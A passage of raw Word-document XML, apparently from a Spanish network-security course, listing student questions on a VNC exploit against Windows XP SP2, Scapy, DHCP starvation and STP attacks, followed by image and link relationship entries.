      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Por qué este ataque es peligroso utilizando un firewall simple.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Explicar cómo funciona el exploit de VNC contra Windows XP SP2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Que es scapy, para que sirve, que puede hacer? (Ejemplos)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Explicar el ataque DHCP starvation, cómo funciona y </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Explicar el ataque STP mandler, como funciona, teoría del ataque y </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId46" w:type="default"/>
      <w:footerReference r:id="rId47" w:type="default"/>
      <w:pgSz w:h="16834" w:w="11909"/>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5">
    <w:pPr>
      <w:contextualSpacing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4">
    <w:pPr>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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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22.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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str0baby.wordpress.com/2012/11/20/hacking-ubuntu-12-04-lts-using-metasploit/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elpuig.xeill.net/Members/jordifarrero/2014-15-seguretat-en-xarxes-sm2ab-diurn/uf4-scapy-python/hacking-ubuntu-metasploit/web-guardada-astr0baby/view" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId18"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